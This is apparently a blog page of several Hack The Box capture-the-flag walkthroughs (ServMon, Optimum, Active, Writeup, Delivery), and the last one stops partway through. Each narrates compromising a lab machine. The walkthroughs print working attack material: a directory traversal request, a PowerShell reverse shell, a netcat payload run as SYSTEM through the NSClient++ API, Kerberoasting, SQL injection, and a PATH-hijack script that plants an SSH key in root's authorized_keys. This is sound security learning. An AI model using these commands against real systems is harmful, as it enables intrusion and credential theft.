Hack The Box – ServMon

ServMon is an easy Windows box created by dmw0ng on Hack The Box. To own this box it is recommended that basic web enumeration, basic Windows enumeration, and SSH tunneling skills. By completing this box you will learn the following skills exploiting NVMS-1000, exploiting NSClient++, and SSH password spraying. Hello world, welcome to haxez where today I will explain how I hacked ServMon.

ServMon Service Enumeration

Once connected to the VPN, I spawned the box and sent it a ping request to check it was online. Then, I performed a Nmap scan against all ports and requested service versions. Furthermore, I told it to run default scripts gave it a minimum packet rate of 10000, and saved the output in all formats. As a result, I learned that there were several ports open including FTP which supports anonymous FTP, SSH, HTTP, SMB, and a bunch of RPC ports.

sudo nmap -sC -sV -p- 10.129.227.75 --min-rate 10000 -oA ServMon
ServMon Service Enumeration

Anonymous FTP

Starting with the lowest port, I used wget to download everything from the anonymous FTP server. As a result, I downloaded 2 files from the user’s directory. One belonging to Nadine named Confidential.txt and one belonging to Nathan called Notes to do.txt. The Confidential.txt file in Nadine’s directory was a note to Nathan that said the following:

Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine

The Notes to do.txt file found in Nathan’s directory was a todo list that said the following:

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

I felt this was quite valuable information. First, I learned that there were two users, one called Nadine and one called Nathan. Next, I learned that there were a number of services including NSClient, NVMS, and Sharepoint. Furthermore, I know that the password for NVMS has recently been changed, and that NVMS is publically accessible.

wget -m --no-passive ftp://anonymous:[email protected]
FTP Files ServMon

Web Application Enumeration

Since SSH is never the intended attack vector, I moved to the next numerical port which was port 80 for HTTP. Upon navigating to the IP address in the Burp browser, A page loaded titled NVMS-1000. After performing a quick Google search, I learned that NVMS-1000 is a monitoring client specifically designed for network video surveillance. I had a quick skim through the documentation but unfortunately, there are no default credentials as the user defines them when performing the installation. I attempted some weak credentials such as admin:admin but was unsuccessful.

ServMon Web Application Enumeration

Next, I navigated to the NSClient page on port 8443. The official walkthrough shows this as having a login form but when I visited it, it didn’t. I couldn’t seem to interact with anything either and there did appear to be an error. Hopefully, this shouldn’t be a problem.

Web Application Enumeration 2

The notes from FTP specifically referenced this application so I presume that this is the intended foothold. After a bit more Googling, I found that NVMS-1000 is vulnerable to a directory traversal vulnerability. The vulnerability has the CVE designation of CVE-2019–20085 and could allow threat actors to retrieve files from the remote system. There is also a Python script on ExploitDB. Furthermore, I learned from the notes that Nadine had left a Passwords.txt file on Nathan’s Desktop. Seems like a match made in heaven. I grabbed a request from Burp’s HTTP history and sent it to the Repeater. I modified the request to include the required directory traversal and pointed it at the Passwords.txt file. Sure enough, I was able to retrieve the following passwords from the file.

Request

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.129.227.75
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: dataPort=6063
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Burp

ServMon Foothold

I now had a list of passwords and potential users. As a result, I created two wordlists, one for the passwords and one for the users containing the usernames root (I’m an optimist), administrator, Nathan, and Nadine. Next, I used crackmapexec to password spray the box with the usernames and passwords. After a few attempts, a login was successful with the Nadine user.

sudo crackmapexec ssh 10.129.227.75 -u users.txt -p password.txt
ServMon Foothold

After logging in with SSH, I was pleasantly surprised to find that I could capture the user flag. Admittedly, I suspected that I would have to move laterally to Nathan first to capture it but nope. I moved to the desktop directory and was able to capture the flag. That makes sense since we stole the passwords.txt from Nathans’s desktop. Perhaps Nathan is no longer required.

nadine@SERVMON C:\Users\Nadine>cd Desktop          
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 2237-9369
Directory of C:\Users\Nadine\Desktop
02/27/2022 10:45 PM <DIR> .
02/27/2022 10:45 PM <DIR> ..
05/25/2023 11:03 PM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 5,814,657,024 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
f18▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓848

ServMon System Enumeration

It’s time to pillage and plunder. After poking around the file system for a bit I noticed the C:\Program Files\NSClient++ directory. Within that directory is a nsclient.ini file which contains the configuration data for the service. The configuration data includes a password.

PS C:\Program Files\NSClient++> type nsclient.ini                           
password = ew2x6SsGTxjRwXOT
Configuration File

Furthermore, it also specifies that the only allowed host is 127.0.0.1 which is the localhost. Perhaps this is why the page was acting janky when I visited it earlier. However, with some SSH tunneling magic, I should be able to trick it into thinking the requests are coming from the host. I used SSH to connect to the host but specified that I wanted to forward port 8443 from the box to 8443 on my attack box.

ssh -L 8443:127.0.0.1:8443 [email protected]

Unfortunately, it seems the jankyness wasn’t to do with my request not coming from 127.0.0.1. It seems that something is broken server side. The screenshot below shows the mess I was receiving whenever I refreshed the page. It seemed like the server was still loading but it was producing errors.

Broken Page

Not to be deterred, I respawned the box a few times, prematurely contacted support, and then tried a different browser. The login page finally loaded and I was able to log in with the password found in the .ini file.

ServMon Privilege Escalation Setup

I now had access to the portal but had no idea what to do. I read through the privilege escalation documentation offered by searchsploit. After that, I also read through the official walkthrough and watched IppSecs video to get a better understanding of what was going on. It was here that everything started going wrong and I wished I had never started this box. Everyone’s writeup says to put the payloads in C:\temp… Well, guess what… there is no C:\Temp. This box absolutely started getting the better of me to the point I had to walk away from it.

ITS GOING TO EAT ME!!!!

I went through a bunch of walkthroughs and found Yep’s walkthrough which made it seem simple by using the Python script on exploitdb. Sorry Yep but Nope! I got concatenation errors which I didn’t have a clue how to fix. I know I’m complaining a lot but I don’t understand how this is an easy box. This privilege escalation is incredibly frustrating.

Python Exploit Fail

What Not To Do

I navigated to settings, and external scripts and clicked add new. Next, I created a new script with the following parameters.

Section: /settings/external scripts/scripts/shell
key: command
value: C:\Temp\pwn.bat

After that, I clicked save, and under the changes menu, I clicked save scripts. Next, I headed to the control menu and clicked reload.

Configuring payload

Please note that you should also check that CheckExternalScripts and Scheduler are enabled in the modules section. These were on by default so I didn’t need to change anything but it is a prerequisite to getting the exploit to work.

Modules

Once all that was set up, I copied a Nishang reverse shell script to my current working directory and added my IP address.

cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 .
$sm=(New-Object Net.Sockets.TCPClient('10.10.14.33',9001)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Once saved, I followed IppSec’s instructions and converted it with iconv.

cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le | base64 -w 0

So I’m going to stop here and say that all of this didn’t work. I took a long break and came back to it. The payloads kept getting caught by Defender and it kept getting frustrating.

ServMon Privilege Escalation

In the end, it was B1nsec’s article that got me through it, thanks dude!. So let’s uncomplicate things. First, I downloaded the 64-bit payload netcat payload onto my attack box. I then set up a Netcat listener on my attack box on port 443. Then, I span up a Python webserver to host the Netcat binary.

┌──(kali㉿kali)-[~/HTB/ServMon]
└─$ wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe
┌──(kali㉿kali)-[~/HTB/ServMon]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

On the target box, I created a directory called temp at the root of C. Not sure why I didn’t think to do this earlier. I think I was in tunnel vision mode. Then, I downloaded the 64-bit Netcat binary and saved it as nc.exe.

PS C:\temp> (New-Object Net.WebClient).DownloadFile('http://10.10.14.33/nc64.exe','C:\temp\nc.exe')

Once I confirmed it had downloaded correctly, I copied B1nsec’s command to create the payload that executes the NetCat binary with SYSTEM privileges.

PS C:\temp> curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.33 443 -e cmd.ex
e"
Enter host password for user 'admin':
Added revshell as scripts\revshell.bat

Finally… I ran the command to execute the exploit.

PS C:\temp> curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=3m
Enter host password for user 'admin':
{"command":"revshell","lines":[{"message":"Command revshell didn't terminate within the timeout period 60s","perf":{}}],"result":3}

The reverse shell connected back to my attack machine and I was able to capture the root flag.

┌──(kali㉿kali)-[~/HTB/ServMon]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
whoami
connect to [10.10.14.33] from (UNKNOWN) [10.129.179.11] 49695
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
type root.txt
d50▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓04a

ServMon Learnings

I said some harsh things about this box during my writeup but in hindsight, the fault was with me. I’m not going to remove those comments because that’s how I felt at the time. This is a good box and once I understood the proper way to perform the privilege escalation, it was easy. The path to foothold was a lot of fun and was fairly simple. The directory traversal was practical and I like how the notes guided you to the file you needed.

The privilege escalation is simple if you do it correctly. Unfortunately, I went down every rabbit hole on the way to getting there. Everything I tried failed and it made me incredibly frustrated. I even started just looking for a flag online so that I could submit it and move on. However, in the end, persistence paid off. Granted I had to find the answer from another writeup but it taught me a lot along the way. I’m glad that this one is out of the way.

Hack The Box – Optimum

Optimum is an easy Windows box created by ch4p on Hack The Box. In order to own Optimum it is recommended that you have basic knowledge of Windows and knowledge of enumerating ports and services. By owning this box you will learn to identify vulnerable services, identify known exploits, and basic Windows privilege escalation techniques. Hello world, welcome to haxez where today I will explain how I compromised Optimum.

Optimum Enumeration

To get started, I spawned the box and then connected to the HTB VPN. Next, I sent a ping to the box to check if it was online and that I could talk to it. Once the box responded, I started a Nmap scan that checked all ports, requested service versions, and ran default scripts. Then I saved the output in all formats and I set the minimum packet rate to 10,000. The results of the scan indicated that only one port was open. It was port 80 for HTTP and was running HttpFileServer 2.4. Furthermore, Nmap reported that the OS was Windows.

sudo nmap -sC -sV -p- 10.129.179.177 --min-rate 10000 -oA optimum
Optimum Enumeration

Web Application Enumeration

I launched Burp Suite and opened the browser. Next, I navigated to the IP address of the box which presented me with what appeared to be a file browser. There was a login option at the top of the page, the current directory, a search box, and a few other tools. At the bottom of the list of options, it confirmed that it was HttpFileServer 2.3.

Web Application Enumeration

I ran whatweb against the application to try and get more information. From the results, I learned that it was Rejetto file server. Furthermore, it also confirmed the server version and provided me with a few other bits of information. I also ran Nikto against the application but it didn’t come back with anything interesting.

whatweb -a3 http://10.129.179.177 -v
Web Application Whatweb

Foothold

I used searchsploit to search for exploits that affected Rejetto and sure enough a few remote code execution vulnerabilities. Furthermore, there was a Metasploit module for the exploit which should make life easier. I could attempt to perform the exploit manually but I’m short on time today so I will use the Metasploit module.

Optimum Searchsploit

I launched Metasploit and searched for Rejetto. It was the only result so I told Metasploit to use it and then configured it. For example, I set the remote host to the IP of the box and the local host to my tun0 interface. Furthermore, I set the local port to 443 and then ran the exploit. Within a few seconds, I received a meterpreter reverse shell. I should note here that I tried a few other local ports which didn’t work.

Metasploit

From here, I was able to drop to a shell and capture the user flag from the C:\Users\kostas\Desktop directory.

meterpreter > shell
C:\Users\kostas\Desktop>type user.txt
type user.txt
8a5▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓0ce
User flag Optimum

Optimum Privilege Escalation

I used ctrl z to background return back to a meterpreter shell and then ran sysinfo. The target system was a 64-bit system but our meterpreter shell was only 32-bit. As a result, I ran ps to look for a 64-bit process to hijack. Explorer.exe was running and was 64bit so I told meterpreter to migrate to that process which was completed successfully.

Process Migration

Next, I used ctrl z to background the meterpreter session and searched for local exploit suggester in Metasploit. Once I found the correct module, I told Metasploit to use it and then listed out my sessions. I then configured the exploit suggester to use session 1 and ran it. And…. it hung.

Sessions

My session was still active but I decided to switch out the payload for a 64-bit version and exploit it again. Perhaps the migration didn’t go smoothly. By switching to the 64-bit payload, my hope was that the local exploit suggester would run better.

set payload windows/x64/meterpreter/reverse_tcp

I then sent the meterpreter session to the background again and configured the local_exploit_suggester to use session 2. This time it worked and was much quicker than the first time I attempted it. There were a number of exploits that looked good but I accidentally tried to background Metasploit which killed the process so I had to start again. All on me that one. Fail.

Exploit

Finally, after exploiting the box again I set the payload to the ms16_032 one. I then configured it to use tun0 (if you don’t do this, it won’t work). Then I ran the exploit and after some janky-looking text, I got a reverse shell and was able to capture the root flag.

meterpreter > shell
Process 1592 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
2a8▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓24e
Optimum Root Flag

Optimum Learnings

Optimum is a fun and quick box that I enjoyed every step of the way. It’s strange, I’ve had the user flag for a while and I can’t remember why I didn’t get the root. It was likely a combination of the 32-bit payload not working and my lack of knowledge early on. However, revisiting it today was a blast. I want to come back to it and attempt it without using Metasploit. It was a great box to do just before starting my 9–5. I feel like this is a perfect difficulty level for easy boxes.

The foothold was fairly simple although I had some issues when using higher local port numbers. Once on the box, the privilege escalation was easy once I switched to the 64-bit payload. Granted, you won’t learn much unless you go and research the exploits yourself but I feel like easy boxes should be learning to use tools more than anything. Anyway, thanks for the box.

Hack The Box – Active

Active is an easy Windows box created by eks & mrb3n on Hack The Box. The skills required to complete this box are a basic knowledge of Active Directory authentication and shared folders. By completing this box you will learn SMB enumeration techniques, Group Policy Preferences Groups.xml enumeration and exploitation, Identification, and exploitation of Kerberoastable accounts. Hello world, welcome to Haxez where today I will explain how I hacked Active.

Enumerating Active

Once connected to the VPN, I pinged the box to check if I could talk to it and then proceeded to run the standard Nmap scan. I scanned all ports, requested versions, ran default scripts, and saved the output in all formats. Looking at the results I suspected that the box was a Domain Controller as it had all the usual suspects. DNS, Kerberos, LDAP, and SMB were all open so there was plenty to get started with.

sudo nmap -sC -sV -p- 10.129.193.5 --min-rate 10000 -oA active
Enumerating Active

Active Server Message Block Enumeration

I ran smbmap against the box to see whether I could access any shares. Sure enough, I had read-only access to the Replication share. Next, I attempted to connect to the replication anonymously with smbclient. That worked so I turned recursive mode on, turned prompts off, and downloaded all the files. While the files were downloading I noticed a file named Groups.xml. In earlier versions of Windows, the Group Policy Preferences feature stored passwords and other sensitive information related to local groups in an XML file called “Groups.xml.”

smbmap -H 10.129.193.5
smbclient //10.129.193.5/Replication
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
Active Server Message Block Enumeration

I checked the Groups.xml file and found the value of the cpassword variable. Then, I used gpp-decrypt to decrypt the password which identified the password as GPPstillStandingStrong2k18.

cat /home/kali/HTB/Active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ                                            
GPPstillStandingStrong2k18
gpp decrypt

Authenticated Active Server Message Block Enumeration

Now that I had a password, I ran smbmap again to see whether I had access to any additional shares. As you can see from the screenshot below, I now had read-only access to a few additional shares including the Users directory.

smbmap -u svc_tgs -p GPPstillStandingStrong2k18 -d active.htb -H 10.129.193.5
smbmap share enum

As a result, I used smbclient to connect to the Users share to have a look around. After a bit of poking around I found the user.txt flag in the svc_tgs users desktop directory. I downloaded it which allowed me to capture the user flag.

smbclient //10.129.193.5/Users -U active.htb/svc_tgs
smb: \> get SVC_TGS\Desktop\User.txt
cat user.txt
962▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓74a
smbclient user flag

Release The Hounds

Since I had credentials, I thought the next best step would be to run Bloodhound and see what information I could obtain about the domain. As a result, I used the bloodhound-python tool to collect the data and then imported it into Bloodhound.

bloodhound-python --dns-tcp -ns 10.129.193.5 -d active.htb -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
Active bloodhound collection

Next, I imported the data to Bloodhound and ran a few queries. Unfortunately, it seems that the collection didn’t work as intended. When running the List all Kerberostable Accounts query, I received no results from Bloodhound. It should have shown me that the Administrator user was vulnerable.

Active bloodhound

Kerberoasting

Even though Bloodhound didn’t show the administrator as being vulnerable to Kerberoasting, I continued with the attack anyway. I will have to come back to it and find out why Bloodhound didn’t find it. Perhaps it was the Python collector doing something funny. Anyway, I ran the GetUsersSPNs.py script from Impaket and was able to grab the administrator hash.

GetUserSPNs.py -request -dc-ip 10.129.193.5 active.htb/svc_tgs
Active Kerberoasting

Hash Cracking

Next, I saved a copy of the hash to a file called hash.txt. I then used hashcat mode 13100 in combination with the rockyou wordlist to crack the hash.

sudo hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat Hash Cracking

With the password cracked, I was able to use psexec.py to connect to the machine as the Administrator and capture the final flag.

psexec.py active.htb/[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Requesting shares on 10.129.193.5.....
[*] Found writable share ADMIN$
[*] Uploading file utdeQdHw.exe
[*] Opening SVCManager on 10.129.193.5.....
[*] Creating service QIAd on 10.129.193.5.....
[*] Starting service QIAd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
345▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓1a5
Active Root Flag

Active Learnings

Overall, I enjoyed this box. It was a great box for reinforcing existing skills such as SMB enumeration. Getting the user flag was easy which is what I want from an easy box. It taught me about the Groups.xml file from GPP so I now know something I didn’t before.

I’m still not sure why Bloodhound didn’t show the Administrator as being Kerbarostable but I might come back to that tonight and take another look. However, I feel that the Bloodhound step could have been avoided anyway if I had just run the right tool. Anyway, great easy box.

Hack The Box – Writeup

Writeup is an easy Linux box created by jkr on Hack The Box. The box has protections in place to prevent brute-force attacks. The skills required to complete this box are enumeration. The skills obtained from completing this box are process enumeration and path hijacking. Hello world, welcome to Haxez where today I will be explaining how I hacked the Hack The Box Writeup box.

Enumerating Writeup

First, I spawned the box and connected my attack box to the Hack The Box lab VPN. Next, I sent a ping to the target to ensure it was online and that I could talk to it. Once the box responded, I performed a Nmap scan targeting all ports. Furthermore, I also requested service versions, told it to run default scripts, gave it a minimum packet rate of 10,000, and told it to save the output in all formats named writeup. As you can see from the screenshot below, ports 22 for SSH and 80 for HTTP were open.

sudo nmap -sC -sV -p- 10.129.95.203 --min-rate 10000 -oA writeup
Enumerating Writeup

Web Application Enumeration

Since SSH was unlikely to be the intended attack vector, I moseyed on over to the web application for a gander. It’s… beautiful! The web application appeared to be an in-development blog for Hack The Box writeups. However, the application was being hit with denial-of-service attacks resulting in DoS protection mechanisms being implemented. The DoS protection blocks any IP that triggers a 400 error in the Apache log.

Writeup Web Application Enumeration

Domo arigato, Mr Roboto

Dirb, gobuster, ffuf, and other directory and file brute force tools are noisy and would generate 400 errors resulting in an IP ban. Therefore, I had to manually and carefully enumerate the web application. One of the first files I look for when hacking web applications is the robots.txt file. It’s a file that tells search indexing robots to ignore the files contained within it. It prevents pages like admin or log-in from being indexed. However, it’s a double-edged sword as it may disclose sensitive information to malicious threat actors. Navigating to the robots.txt file I found a directory called writeup.

Domo arigato, Mr Roboto

Enumerating Writeup Technologies

I navigated to the writeup directory which presented a basic web application with minimal functionality. There were several links to blog posts and clicking on those blog posts revealed that it was a PHP-based application. Furthermore, a parameter named page was being used to retrieve the blog posts. For example, visiting the following URL would retrieve a blog post called blue http://10.129.95.203/writeup/index.php?page=blue. I used whatweb to identify the CMS or Content Management System. As a result, I learned that it was using a version of CMS-Made-Simple from 2004–2019.

Writeup Whatweb

Furthermore, looking at the structure of the CMS I found the location of the changelog file. Navigating to the file revealed the specific version of the CMS being used.

version

CMS Made Simple Blind SQL Injection Failures

Using searchsploit to search for vulnerabilities impacting CMS Made Simple, I found a blind SQL injection vulnerability. The vulnerability has a CVE designation of CVE-2019–9053. I located the Python script and copied it to my current working directory. You can do this with the searchsploit -m flag to mirror it.

searchsploit

Unfortunately, attempting to run this exploit produced errors regarding print statements. I wasn’t sure what to do here as I’m crap at Python. Fortunately, IppSecs video explained that I needed to install the termcolor module with pip. While this didn’t resolve the problem, it did point me in the right direction.

First, I had to install pip2.7 which I was able to do by following the post >>HERE<<

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2.7 get-pip.py

However, when attempting to install termcolor, I received errors about an egg or something. After a bit more Google searching, I found this post >>HERE<< which explained I needed to upgrade setuptools.

pip install --upgrade setuptools

CMS Made Simple Blind SQL Injection Success

I was finally ready to run the payload. Using the following command, I was able to attack the SQL injection vulnerability and retrieve a salt, username, email address, and password hash. It was awesome watching the script come alive and iterate through the alphabet and pull the information out of the database.

python2.7 46635.py --url http://10.129.95.203/writeup
Blind SQL Injection Gif
hash captured from sql injection

Writeup Foothold

I echoed the hash followed by a colon, followed by the salt into a file called jkrhash.txt.

echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > jkrhash.txt

Next, I used hashcat with mode 20 (MD5 salt and password) to crack the hash with the wordlist rockyou.

hashcat -a 0 -m 20 jkrhash.txt /usr/share/wordlists/rockyou.txt
Writeup hashcat

I was in, I was able to use the credentials to SSH to the box as the jkr user. Furthermore, once on the box, I was able to capture the user flag.

jkr@writeup:~$ cat user.txt
8d0▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓9e9

Writeup System Enumeration

After grabbing the user flag, I started enumerating the system. First, I checked the command history of the jkr user to see if it contained anything interesting. It didn’t. Next, I checked if I could run sudo -l to see what commands jkr could run as sudo. Interestingly, sudo wasn’t found on the system. Finally, I decided to go for the easy option and ran linpeas. I span up a Python webserver and used wget to download it to the /tmp directory. Then, I gave it executable permissions and ran it.

linpeas

The output kept highlighting the /usr/local path as a privilege escalation vector but I didn’t know why. After a bit more investigation, it seems that the jkr user is part of the staff group. According to the Debian wiki the staff group allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may “override” the executables in /bin and /usr/bin with the same name). As you can see from the screenshot below, /usr/local/bin is also the first path that gets called when executing files.

path and id

Writeup Process Enumeration

I’m still getting my head around this privilege escalation method if I’m honest. However, I think I understand it. To explain, the jkr user is a member of the staff group and the staff group has the ability to modify /usr/local/ without root privileges. If I can find a binary that gets executed as root without it using the absolute file path, then I can drop a malicious binary of the same name inside the /usr/local/bin directory. Then, when the conditions are met for the binary to be executed, my malicious binary gets executed with root privileges because my first environmental path is /usr/local/bin.

With that in mind, I ran pspy32 and found that when I log in to SSH with jkr, the run-parts binary is executed without an absolute file path. You can see it in the image below, the third blue line from the bottom.

pspy

Next, I checked to see the ownership of the run-parts binary to see if it was owned by root. I used which to locate it and then ran ls -lash to list the permissions. Sure enough, it was owned by root and genuinely appeared to be the only binary not being executed with a full file path.

run-parts binary

Writeup Privilege Escalation

In theory, I should now be able to create my own binary or script called run-parts in /usr/local/bin. Then when I SSH to the system as jkr, my malicious run-parts binary will be executed instead of the one in /bin. There are multiple methods that I could have used to do this. For example, I could have created a script that copied the bash binary to /tmp and gave it setuid capabilities (I think). Additionally, I could have created a reverse shell that connected back to my machine. However, I thought the most reliable method was to drop an SSH key in the root user’s authorized_keys file. Plus, this is the method that IppSec used and it seemed to work.

When the script is executed, it creates a file in /tmp called Exploit-Complete. This isn’t required as it’s just a visual indicator to show that the script was executed. Next, it creates the .ssh directory in the root user’s directory. Then, it echos my public key into the root user’s authorized_keys file. Finally, it gives the file 600 permissions. The script is saved as run-parts and saved to /usr/local/bin. I created it using nano.

#!/bin/bash
touch /tmp/Exploit-Complete
mkdir /root/.ssh
echo 'ssh-rsa AAAA <<<SNIP>>> QqNzw9WKiU0= kali@kali' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Once the file was saved, I made it executable by running chmod +x against it. Then I created a new terminal tab and connected back to the box as the jkr user. I checked the /tmp directory and sure enough, the Exploit-Complete file had been created. Hopefully, that means that my public key is now in the root user’s authorized_keys files.

Writeup Exploit

Finally, I connected SSH as the root user using the private key I generated. I was able to login and grab the root flag.

┌──(kali㉿kali)-[~/HTB/Writeup]
└─$ ssh -i root [email protected]
Last login: Fri Aug 6 08:59:19 2021
root@writeup:~# cat root.txt
786▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓4b4

Writeup Learnings

This was a fun box which I learned a few things from. The first was getting the Python SQL injection payload to work. As soon as I received that first error I immediately thought that I wasn’t going to be able to complete the box. However, after a bit of persistence, the payload worked and left me with a big grin on my face. The cracking was fairly simple but always good to get some practice.

The system enumeration and privilege escalation was interesting. I didn’t know about the staff group before and without guides pointing me in the right direction, I wouldn’t have got it. I’m starting to understand the brilliance of pspy too, without it, I’m not sure how I would have identified the correct binary. Overall this is a good box and has a nice method for practicing different techniques for privilege escalation. You could change your binary to perform different things and then easily trigger it by connecting back to the box. Thanks, jkr, fun box.

Hack The Box – Delivery

Delivery is an easy Linux box created by IppSec on Hack The Box and was released on the 09th Jan 2021. Hello world, welcome to Haxez where today I will be explaining how I hacked Delivery. To complete this box it is recommended that you have basic web enumeration and brute force skills. By completing this box you will learn email impersonation and intermediate password-cracking skills.

Delivery Service Enumeration

First, I connected to the Hack The Box VPN and spawned the Delivery box. After receiving the IP address, I sent it a ping to check that it was online. The box responded to my ping so I performed a Nmap scan to check all ports, request service versions and run default scripts. I set the minimum packet rate to 10000 packets per second and saved the output in all formats. As a result, I learnt that port 22 for Open SSH 7.9, port 80 for Nginx 1.14.2 and port 8065 for an unknown service were open. Furthermore, the SSH banner suggested that the OS was Debian.

┌──(kali㉿kali)-[~/HTB/Delivery]
└─$ sudo nmap -sC -sV -p- 10.129.207.229 --min-rate 10000 -oA Delivery
Delivery Service Enumeration

Delivery Web Application Enumeration

I navigated to the application on port 80 by visiting the IP address in my browser. After the application loaded, I saw that it was HTML 5 application that had two options. The first one I looked at was the contact us page. In short, the contact us page explains that unregistered users need to use the help desk to have an email address created. Once the email address has been created, the user will be able to access the MatterMost server.

Delivery Web Application Enumeration

Next, I clicked the link for the MatterMost server but received an error. The application was redirecting to the domain delivery.htb on port 8065 (the mystery port). However, since that domain doesn’t exist in the real world it can’t resolve. I will fix this in a moment. The other link on the application was for the helpdesk. However, upon clicking the link I received an error as it was also trying to load a domain that didn’t exist.

Web Application Error

In order to rectify this, I added the hostname to my host file through the use of echo and tee. Echo will echo the data you provide back to you. Tee will read from standard input and write to standard output and files. After adding the domains to my host file, I refreshed the page and was able to view the intended applications.

┌──(kali㉿kali)-[~/HTB/Delivery]
└─$ echo "10.129.207.229 delivery.htb helpdesk.delivery.htb" | sudo tee -a /etc/hosts
Support Center

Exploiting The Ticketing System

I decided to create a new ticket to test the functionality. First I populated the contact information with bogus data. Then, I completed the CAPTCHA text and clicked Create a ticket. After creating the ticket the web application produced a response advising me of my ticket number. However, the application also informed me that I could reply to the ticket by emailing the address [email protected]. The mailbox appears to be created dynamically for use with the ticketing system.

Exploiting The Ticketing System

The MatterMost application required a corporate email address to sign up. I now had a corp email address where I could view its emails through the ticket system. I headed back to the MatterMost application and signed up with the [email protected] email address. Then, MatterMost responded and said that I needed to verify my email address (as most online sites do). I headed back to the ticketing system and could now view the verification email.

Delivery Support Center

Exploring MatterMost

After logging in to MatterMost, there was an option to join the Internal channel. Joining the channel and reading through the messages I learnt that maildeliverer user had a password of Youve_G0t_Mail!. Furthermore, the root user has asked for a program to prevent password reuse. They go on to explain that while certain words may not be found within a wordlist, hashcat rules can be used to crack variations.

Exploring MatterMost

With the credentials found in the MatterMost application, I was able to SSH to the box as the maildeliverer user. Once on the box, I was able to capture the user.txt flag.

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
maildeliverer@Delivery:~$ pwd
/home/maildeliverer
maildeliverer@Delivery:~$ ls
user.txt
maildeliverer@Delivery:~$ cat user.txt
29f▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓8f3

Delivery Host Enumeration

Since MatterMost is a database-driven web application, there must be a database connection configuration file on the box. After a bit of poking around, I found the database connection details within the /opt/mattermost/config/config.json file in the SqlSettings section.

"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/
Delivery Host Enumeration

